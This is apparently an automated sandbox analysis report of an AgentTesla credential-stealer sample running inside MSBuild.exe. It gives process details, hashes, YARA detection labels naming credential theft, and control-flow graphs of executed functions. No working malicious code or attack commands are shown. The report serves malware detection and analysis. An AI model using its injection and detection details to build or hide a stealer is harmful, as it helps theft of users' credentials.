                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:04:20:07
                                  Start date:15/01/2025
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                  Imagebase:0xc90000
                                  File size:262'432 bytes
                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3309367586.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3309367586.0000000003034000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3309367586.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3309367586.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:7
                                  Start time:04:20:07
                                  Start date:15/01/2025
                                  Path:C:\Windows\System32\wermgr.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5244" "2828" "2700" "2832" "0" "0" "2836" "0" "0" "0" "0" "0"
                                  Imagebase:0x7ff6070d0000
                                  File size:229'728 bytes
                                  MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:8.6%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:72
                                    Total number of Limit Nodes:6
                                    execution_graph 40885 6a0d4f0 40886 6a0d558 CreateWindowExW 40885->40886 40888 6a0d614 40886->40888 40888->40888 40889 1560848 40891 156084e 40889->40891 40890 156091b 40891->40890 40893 1561382 40891->40893 40895 1561396 40893->40895 40894 1561488 40894->40891 40895->40894 40897 1567ec0 40895->40897 40898 1567eca 40897->40898 40901 1567ee4 40898->40901 40902 68bd9f9 40898->40902 40906 68bda08 40898->40906 40901->40895 40904 68bda1d 40902->40904 40903 68bdc32 40903->40901 40904->40903 40905 68bdc48 GlobalMemoryStatusEx 40904->40905 40905->40904 40907 68bda1d 40906->40907 40908 68bdc32 40907->40908 40909 68bdc48 GlobalMemoryStatusEx 40907->40909 40908->40901 40909->40907 40910 14fd030 40911 14fd048 40910->40911 40912 14fd0a2 40911->40912 40917 6a0d697 40911->40917 40921 6a0a48c 40911->40921 40930 6a0d6a8 40911->40930 40934 6a0e7f8 40911->40934 40918 6a0d6a5 40917->40918 40919 6a0a48c CallWindowProcW 40918->40919 40920 6a0d6ef 40919->40920 40920->40912 40922 6a0a497 40921->40922 40923 6a0e869 40922->40923 40925 6a0e859 40922->40925 40926 6a0e867 40923->40926 40959 6a0e46c 40923->40959 40943 6a0e990 40925->40943 40948 6a0e980 40925->40948 40953 6a0ea5c 40925->40953 40931 6a0d6ce 40930->40931 40932 6a0a48c CallWindowProcW 40931->40932 40933 6a0d6ef 40932->40933 40933->40912 40935 6a0e835 40934->40935 40936 6a0e869 40935->40936 40938 6a0e859 40935->40938 40937 6a0e46c CallWindowProcW 40936->40937 40939 6a0e867 40936->40939 40937->40939 40940 6a0e980 CallWindowProcW 40938->40940 40941 6a0e990 CallWindowProcW 40938->40941 40942 6a0ea5c CallWindowProcW 40938->40942 40940->40939 40941->40939 40942->40939 40945 6a0e9a4 40943->40945 40944 6a0ea30 40944->40926 40963 6a0ea38 40945->40963 40967 6a0ea48 40945->40967 40950 6a0e991 40948->40950 40949 6a0ea30 40949->40926 40951 6a0ea38 CallWindowProcW 40950->40951 40952 6a0ea48 CallWindowProcW 40950->40952 40951->40949 40952->40949 40954 6a0ea6a 40953->40954 40955 6a0ea1a 40953->40955 40957 6a0ea38 CallWindowProcW 40955->40957 40958 6a0ea48 CallWindowProcW 40955->40958 40956 6a0ea30 40956->40926 40957->40956 40958->40956 40960 6a0e477 40959->40960 40961 6a0fcca CallWindowProcW 40960->40961 40962 6a0fc79 40960->40962 40961->40962 40962->40926 40964 6a0ea48 40963->40964 40965 6a0ea59 40964->40965 40970 6a0fc00 40964->40970 40965->40944 40968 6a0fc00 CallWindowProcW 40967->40968 40969 6a0ea59 40967->40969 40968->40969 40969->40944 40971 6a0e46c CallWindowProcW 40970->40971 40972 6a0fc1a 40971->40972 40972->40965

                                    Executed Functions

                                    Function 068B0308 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-3723351465
                                    • Opcode ID: 75f8a80f5c894cdfabf442cd15dd46ff955a534be54baffd42e235ba927cd8f4
                                    • Instruction ID: 6a104c33fbcd0104da77ac1cf3e115b2d4e6c936f727f23354597a2df757d69d
                                    • Opcode Fuzzy Hash: 75f8a80f5c894cdfabf442cd15dd46ff955a534be54baffd42e235ba927cd8f4
                                    • Instruction Fuzzy Hash: E7D25830E002098FDB64DF68C494A9EB7B2FF89304F5495A9D449EB365EB34ED85CB80
                                    Function 068B9297 Relevance: 3.2, Strings: 2, Instructions: 720COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $]q$$]q
                                    • API String ID: 0-127220927
                                    • Opcode ID: e3fd1224889fb1699efc650eb622bcbf37d662cae3988c437d584fade2f24406
                                    • Instruction ID: 8bea2e8131be58d59d127324c906dc8a54d72a53d3d452f533bba315c233276d
                                    • Opcode Fuzzy Hash: e3fd1224889fb1699efc650eb622bcbf37d662cae3988c437d584fade2f24406
                                    • Instruction Fuzzy Hash: 3C427F30E001098FDF64CF68D5947EDB7B6EB8A310F209869D619EB395DA38DC85CB91
                                    Function 068B5D50 Relevance: 3.0, Strings: 2, Instructions: 485COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1226 68b5d50-68b5d6e 1227 68b5d70-68b5d73 1226->1227 1228 68b5d8a-68b5d8d 1227->1228 1229 68b5d75-68b5d83 1227->1229 1230 68b5d8f-68b5da9 1228->1230 1231 68b5dae-68b5db1 1228->1231 1235 68b5df6-68b5e0c 1229->1235 1236 68b5d85 1229->1236 1230->1231 1232 68b5db3-68b5dcf 1231->1232 1233 68b5dd4-68b5dd7 1231->1233 1232->1233 1238 68b5dd9-68b5de3 1233->1238 1239 68b5de4-68b5de6 1233->1239 1245 68b5e12-68b5e1b 1235->1245 1246 68b6027-68b602a 1235->1246 1236->1228 1240 68b5de8 1239->1240 1241 68b5ded-68b5df0 1239->1241 1240->1241 1241->1227 1241->1235 1248 68b6032-68b603c 1245->1248 1249 68b5e21-68b5e3e 1245->1249 1250 68b602c-68b6031 1246->1250 1253 68b603e-68b6067 1248->1253 1254 68b608d-68b609e 1248->1254 1260 68b6014-68b6021 1249->1260 1261 68b5e44-68b5e6c 1249->1261 1255 68b6069-68b606c 1253->1255 1264 68b609f 1254->1264 1265 68b6083-68b6087 1254->1265 1257 68b6072-68b6081 1255->1257 1258 68b62a1-68b62a4 1255->1258 1257->1265 1269 68b60a0-68b60e4 1257->1269 1262 68b62c7-68b62ca 1258->1262 1263 68b62a6-68b62c2 1258->1263 1260->1245 1260->1246 1261->1260 1278 68b5e72-68b5e7b 1261->1278 1267 68b62d0-68b62dc 1262->1267 1268 68b6375-68b6377 1262->1268 1263->1262 1264->1250 1264->1269 1265->1254 1276 68b62e7-68b62e9 1267->1276 1271 68b6379 1268->1271 1272 68b637e-68b6381 1268->1272 1282 68b60ea-68b60fb 1269->1282 1283 68b6275-68b628a 1269->1283 1271->1272 1272->1255 1275 68b6387-68b6390 1272->1275 1280 68b62eb-68b62f1 1276->1280 1281 68b6301-68b6305 1276->1281 1278->1248 1287 68b5e81-68b5e9d 1278->1287 1288 68b62f3 1280->1288 1289 68b62f5-68b62f7 1280->1289 1285 68b6313 1281->1285 1286 68b6307-68b6311 1281->1286 1292 68b6101-68b611e 1282->1292 1293 68b6260-68b626f 1282->1293 1283->1258 1291 68b6318-68b631a 1285->1291 1286->1291 1297 68b5ea3-68b5ecd 1287->1297 1298 68b6002-68b600e 1287->1298 1288->1281 1289->1281 1294 68b632b-68b6364 1291->1294 1295 68b631c-68b631f 1291->1295 1292->1293 1305 68b6124-68b621a call 68b4570 1292->1305 1293->1282 1293->1283 1294->1257 1314 68b636a-68b6374 1294->1314 1295->1275 1310 68b5ff8-68b5ffd 1297->1310 1311 68b5ed3-68b5efb 1297->1311 1298->1260 1298->1278 1361 68b6228 1305->1361 1362 68b621c-68b6226 1305->1362 1310->1298 1311->1310 1319 68b5f01-68b5f2f 1311->1319 1319->1310 1325 68b5f35-68b5f3e 1319->1325 1325->1310 1327 68b5f44-68b5f76 1325->1327 1334 68b5f78-68b5f7c 1327->1334 1335 68b5f81-68b5f9d 1327->1335 1334->1310 1336 68b5f7e 1334->1336 1335->1298 1337 68b5f9f-68b5ff6 call 68b4570 1335->1337 1336->1335 1337->1298 1363 68b622d-68b622f 1361->1363 1362->1363 1363->1293 1364 68b6231-68b6236 1363->1364 1365 68b6238-68b6242 1364->1365 1366 68b6244 1364->1366 1367 68b6249-68b624b 1365->1367 1366->1367 1367->1293 1368 68b624d-68b6259 1367->1368 1368->1293
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $]q$$]q
                                    • API String ID: 0-127220927
                                    • Opcode ID: bc0b0d0d1c269e5a03b61e6ca060b5e930b83403496c0bf5c2cace81fb0ecb81
                                    • Instruction ID: be7b91c84fbd5ba5322689118a7f06f53b911d4f469ec10912099f975608c414
                                    • Opcode Fuzzy Hash: bc0b0d0d1c269e5a03b61e6ca060b5e930b83403496c0bf5c2cace81fb0ecb81
                                    • Instruction Fuzzy Hash: 23028F30B0020A9FDB58DF69D494AAEB7E2FF84304F148569D505EB394EB75EC86CB81
                                    Function 068BE0D9 Relevance: 2.8, Strings: 2, Instructions: 334COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1500 68be0d9-68be0fa 1501 68be15e-68be165 1500->1501 1502 68be0fc-68be129 call 68bd1b8 call 68bd094 1500->1502 1509 68be12e-68be13b 1502->1509 1511 68be13d-68be156 1509->1511 1512 68be166-68be1cd 1509->1512 1511->1501 1522 68be1cf-68be1d1 1512->1522 1523 68be1d6-68be1e6 1512->1523 1524 68be475-68be47c 1522->1524 1525 68be1e8 1523->1525 1526 68be1ed-68be1fd 1523->1526 1525->1524 1528 68be45c-68be46a 1526->1528 1529 68be203-68be211 1526->1529 1532 68be47d-68be4f6 1528->1532 1534 68be46c-68be46e 1528->1534 1529->1532 1533 68be217 1529->1533 1533->1532 1535 68be2a8-68be2c9 1533->1535 1536 68be40f-68be42a 1533->1536 1537 68be2ce-68be2ef 1533->1537 1538 68be42c-68be44e 1533->1538 1539 68be282-68be2a3 1533->1539 1540 68be3e1-68be40d 1533->1540 1541 68be347-68be36f 1533->1541 1542 68be25b-68be27d 1533->1542 1543 68be31a-68be342 1533->1543 1544 68be21e-68be230 1533->1544 1545 68be450-68be45a 1533->1545 1546 68be3b6-68be3dc 1533->1546 1547 68be235-68be256 1533->1547 1548 68be2f4-68be315 1533->1548 1549 68be374-68be3b1 1533->1549 1534->1524 1535->1524 1536->1524 1537->1524 1538->1524 1539->1524 1540->1524 1541->1524 1542->1524 1543->1524 1544->1524 1545->1524 1546->1524 1547->1524 1548->1524 1549->1524
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Xaq$$]q
                                    • API String ID: 0-1280934391
                                    • Opcode ID: cacde5b8dc47bfb9fbbae7307790b0905d7db570f54b60d443a4c1794ffc906f
                                    • Instruction ID: a4e4d099fe0ab6b6cc431819d98e85dbada623e2c2842b5ca2f800cf875b5cc4
                                    • Opcode Fuzzy Hash: cacde5b8dc47bfb9fbbae7307790b0905d7db570f54b60d443a4c1794ffc906f
                                    • Instruction Fuzzy Hash: 52B1D670B002189FDB59EF7898592BE7BA7BFC8780B05846DD456DB388DE38CC028791
                                    Function 0156A978 Relevance: 2.8, Instructions: 2805COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 18d72c5f01e053d31200e156a7a5bf12b3ee7f54a8a0c3290646542b5479bebb
                                    • Instruction ID: 420b126e5980a4073e1590ed8ad4038bfb6ce20dabded5790c02856341e54f7b
                                    • Opcode Fuzzy Hash: 18d72c5f01e053d31200e156a7a5bf12b3ee7f54a8a0c3290646542b5479bebb
                                    • Instruction Fuzzy Hash: 2953E531D10B1A8ACB51EF68C8845ADF7B1FF99300F15C79AE4597B121EB70AAD4CB81
                                    Function 0156DBE0 Relevance: 2.3, Instructions: 2275COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d5a79b0f63de3cb05d5850f8c5d9a8a48a1b30530618650f22d368a60b8ddef5
                                    • Instruction ID: 8c6167f0b33ce9e30b006f70bb595be109a760482a161916ad97af9300515f37
                                    • Opcode Fuzzy Hash: d5a79b0f63de3cb05d5850f8c5d9a8a48a1b30530618650f22d368a60b8ddef5
                                    • Instruction Fuzzy Hash: 7E333F31D107198EDB11EF68C8905ADF7B5FF99300F15C79AE458AB221EB70AAC5CB81
                                    Function 068B3560 Relevance: 1.9, Strings: 1, Instructions: 604COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $
                                    • API String ID: 0-3993045852
                                    • Opcode ID: 6d8e1c5bdde1db77ce04b7415983e9fdca04d6d8dd372125855e1bf1b63e2617
                                    • Instruction ID: d6823575e56872a7f3b0c7d45e612b54166065983532c81149facfbab4919dab
                                    • Opcode Fuzzy Hash: 6d8e1c5bdde1db77ce04b7415983e9fdca04d6d8dd372125855e1bf1b63e2617
                                    • Instruction Fuzzy Hash: 6F22CE75E002199FDF60CFA9C4906EEBBB2EF85310F20846AD559EB394DA35DC42CB91
                                    Function 01563E88 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \V%m
                                    • API String ID: 0-324988934
                                    • Opcode ID: a73a8fee3f00439f42c21216de5e664de2fbdbdd26abb7d27fc31f3516156b39
                                    • Instruction ID: f0f091f42c91cc3c4aaf99f4c81ef986b5f8e4e654d116b50de74da2fe41afd9
                                    • Opcode Fuzzy Hash: a73a8fee3f00439f42c21216de5e664de2fbdbdd26abb7d27fc31f3516156b39
                                    • Instruction Fuzzy Hash: 9D916F70E00209DFDF54CFA9C98179EFBF6BF88314F148129E419AB294DB749846CB85
                                    Function 068B45C0 Relevance: .8, Instructions: 817COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 42e5143d163490f0722f406c8a62078cde9507b529d4ff4b7254b78f013e8f74
                                    • Instruction ID: 96b6e60f85f0ae01d747006832632dc569d826e80ab846555ac0ff6879a8ae27
                                    • Opcode Fuzzy Hash: 42e5143d163490f0722f406c8a62078cde9507b529d4ff4b7254b78f013e8f74
                                    • Instruction Fuzzy Hash: 8862CE30A002099FDB54DF68D585AADBBF2FF84304F148469E505EB3AADB75EC46CB81
                                    Function 068BA150 Relevance: .6, Instructions: 645COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9afe272c03729d63c8f7aad6f2e194c990ce0a6f2e95084f7363616f8f78bc97
                                    • Instruction ID: 2db6afe661e0e75b6e0efa8decdca06bf627c64b9c8e07326ad632e383fc90f4
                                    • Opcode Fuzzy Hash: 9afe272c03729d63c8f7aad6f2e194c990ce0a6f2e95084f7363616f8f78bc97
                                    • Instruction Fuzzy Hash: 13328134B102098FDB59DF68D890BAEB7B6FB88310F108929D505E7395DB39EC46CB91
                                    Function 01564AA0 Relevance: .3, Instructions: 266COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 52f751e6c42bdb64396733044cf4775d0bbf1ff99f6fd90840adecadc09dc548
                                    • Instruction ID: c69d835ecb438eab4b80d8b0bcabafa2d838bec3fd666f3a8a93dce6d2454092
                                    • Opcode Fuzzy Hash: 52f751e6c42bdb64396733044cf4775d0bbf1ff99f6fd90840adecadc09dc548
                                    • Instruction Fuzzy Hash: CBB13B70E00209CFEF14CFA9D9857ADBBF6BF88714F148529D415AB394EB749885CB81
                                    Function 0156480C Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2056 156480c-15648a4 2059 15648a6-15648b1 2056->2059 2060 15648ee-15648f0 2056->2060 2059->2060 2062 15648b3-15648bf 2059->2062 2061 15648f2-156490a 2060->2061 2068 1564954-1564956 2061->2068 2069 156490c-1564917 2061->2069 2063 15648e2-15648ec 2062->2063 2064 15648c1-15648cb 2062->2064 2063->2061 2066 15648cf-15648de 2064->2066 2067 15648cd 2064->2067 2066->2066 2070 15648e0 2066->2070 2067->2066 2072 1564958-156496a 2068->2072 2069->2068 2071 1564919-1564925 2069->2071 2070->2063 2073 1564927-1564931 2071->2073 2074 1564948-1564952 2071->2074 2079 1564971-156499d 2072->2079 2075 1564935-1564944 2073->2075 2076 1564933 2073->2076 2074->2072 2075->2075 2078 1564946 2075->2078 2076->2075 2078->2074 2080 15649a3-15649b1 2079->2080 2081 15649b3-15649b9 2080->2081 2082 15649ba-1564a17 2080->2082 2081->2082 2089 1564a27-1564a2b 2082->2089 2090 1564a19-1564a1d 2082->2090 2092 1564a2d-1564a31 2089->2092 2093 1564a3b-1564a3f 2089->2093 2090->2089 2091 1564a1f-1564a22 call 1560ab8 2090->2091 2091->2089 2092->2093 2095 1564a33-1564a36 call 1560ab8 2092->2095 2096 1564a41-1564a45 2093->2096 2097 1564a4f-1564a53 2093->2097 2095->2093 2096->2097 2099 1564a47 2096->2099 2100 1564a55-1564a59 2097->2100 2101 1564a63 2097->2101 2099->2097 2100->2101 2102 1564a5b 2100->2102 2103 1564a64 2101->2103 2102->2101 2103->2103
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \V%m$\V%m
                                    • API String ID: 0-3465736428
                                    • Opcode ID: f65540f62f6240a5edee316a06acecd15c5426ecd8a109744bb1acf9e6cd56d9
                                    • Instruction ID: 2ce2ac35b749a83f20bd003e9f750e65328a63aa4ac6373584cc28ca932c88e7
                                    • Opcode Fuzzy Hash: f65540f62f6240a5edee316a06acecd15c5426ecd8a109744bb1acf9e6cd56d9
                                    • Instruction Fuzzy Hash: 527159B0E002499FDB14DFA9C8807DEBBF6BF88314F148129E418AB254DB749882CB95
                                    Function 01564818 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2104 1564818-15648a4 2107 15648a6-15648b1 2104->2107 2108 15648ee-15648f0 2104->2108 2107->2108 2110 15648b3-15648bf 2107->2110 2109 15648f2-156490a 2108->2109 2116 1564954-1564956 2109->2116 2117 156490c-1564917 2109->2117 2111 15648e2-15648ec 2110->2111 2112 15648c1-15648cb 2110->2112 2111->2109 2114 15648cf-15648de 2112->2114 2115 15648cd 2112->2115 2114->2114 2118 15648e0 2114->2118 2115->2114 2120 1564958-156499d 2116->2120 2117->2116 2119 1564919-1564925 2117->2119 2118->2111 2121 1564927-1564931 2119->2121 2122 1564948-1564952 2119->2122 2128 15649a3-15649b1 2120->2128 2123 1564935-1564944 2121->2123 2124 1564933 2121->2124 2122->2120 2123->2123 2126 1564946 2123->2126 2124->2123 2126->2122 2129 15649b3-15649b9 2128->2129 2130 15649ba-1564a17 2128->2130 2129->2130 2137 1564a27-1564a2b 2130->2137 2138 1564a19-1564a1d 2130->2138 2140 1564a2d-1564a31 2137->2140 2141 1564a3b-1564a3f 2137->2141 2138->2137 2139 1564a1f-1564a22 call 1560ab8 2138->2139 2139->2137 2140->2141 2143 1564a33-1564a36 call 1560ab8 2140->2143 2144 1564a41-1564a45 2141->2144 2145 1564a4f-1564a53 2141->2145 2143->2141 2144->2145 2147 1564a47 2144->2147 2148 1564a55-1564a59 2145->2148 2149 1564a63 2145->2149 2147->2145 2148->2149 2150 1564a5b 2148->2150 2151 1564a64 2149->2151 2150->2149 2151->2151
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \V%m$\V%m
                                    • API String ID: 0-3465736428
                                    • Opcode ID: 61cdfbe46c092eb5f641721cb24ace5105b67fe7171f2e6dbe03c6c78fccc0bc
                                    • Instruction ID: 28b662373900e777917ca59c867eebd3ac2ebb61bdd1b3be118a753c8d38fe79
                                    • Opcode Fuzzy Hash: 61cdfbe46c092eb5f641721cb24ace5105b67fe7171f2e6dbe03c6c78fccc0bc
                                    • Instruction Fuzzy Hash: A1716D70E00249DFDF14DFA9C8807DEBBF6BF88714F148129E415AB254DB749845CB95
                                    Function 068BE571 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2834 68be571-68be58b 2835 68be58d-68be5b4 call 68bd1c8 2834->2835 2836 68be5b5-68be5d4 call 68bd1d4 2834->2836 2842 68be5da-68be639 2836->2842 2843 68be5d6-68be5d9 2836->2843 2850 68be63b-68be63e 2842->2850 2851 68be63f-68be6cc GlobalMemoryStatusEx 2842->2851 2855 68be6ce-68be6d4 2851->2855 2856 68be6d5-68be6fd 2851->2856 2855->2856
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: caa6ca85f47c2e267d7e70546a82bdd215215ee332999f2edcb5a3ef41edd6d0
                                    • Instruction ID: 0d2adbc94b104539703c28f2691ee5a6f89c19dea033f881d3f90cfc46c3f4d5
                                    • Opcode Fuzzy Hash: caa6ca85f47c2e267d7e70546a82bdd215215ee332999f2edcb5a3ef41edd6d0
                                    • Instruction Fuzzy Hash: D9411572D003498FCB14DFA9D8442EEBBF1AF99310F1585AAD604E7391EB389845CBA1
                                    Function 06A0D4E4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2859 6a0d4e4-6a0d556 2861 6a0d561-6a0d568 2859->2861 2862 6a0d558-6a0d55e 2859->2862 2863 6a0d573-6a0d5ab 2861->2863 2864 6a0d56a-6a0d570 2861->2864 2862->2861 2865 6a0d5b3-6a0d612 CreateWindowExW 2863->2865 2864->2863 2866 6a0d614-6a0d61a 2865->2866 2867 6a0d61b-6a0d653 2865->2867 2866->2867 2871 6a0d660 2867->2871 2872 6a0d655-6a0d658 2867->2872 2873 6a0d661 2871->2873 2872->2871 2873->2873
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A0D602
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312733553.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_6a00000_MSBuild.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 7988c191e49cd02d75d12cba1fa2a24242f2fe1ad84d808b41317065c08e7dd8
                                    • Instruction ID: 4863e73943608ae5d609e6240d1291995adf43badbe6e9c61f9cbc2505e8aeea
                                    • Opcode Fuzzy Hash: 7988c191e49cd02d75d12cba1fa2a24242f2fe1ad84d808b41317065c08e7dd8
                                    • Instruction Fuzzy Hash: D851DFB1C103499FDB14DF99D984ADEBBB5FF48310F24812AE818AB250D774A885CF90
                                    Function 06A0D4F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2874 6a0d4f0-6a0d556 2875 6a0d561-6a0d568 2874->2875 2876 6a0d558-6a0d55e 2874->2876 2877 6a0d573-6a0d612 CreateWindowExW 2875->2877 2878 6a0d56a-6a0d570 2875->2878 2876->2875 2880 6a0d614-6a0d61a 2877->2880 2881 6a0d61b-6a0d653 2877->2881 2878->2877 2880->2881 2885 6a0d660 2881->2885 2886 6a0d655-6a0d658 2881->2886 2887 6a0d661 2885->2887 2886->2885 2887->2887
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A0D602
                                    Memory Dump Source
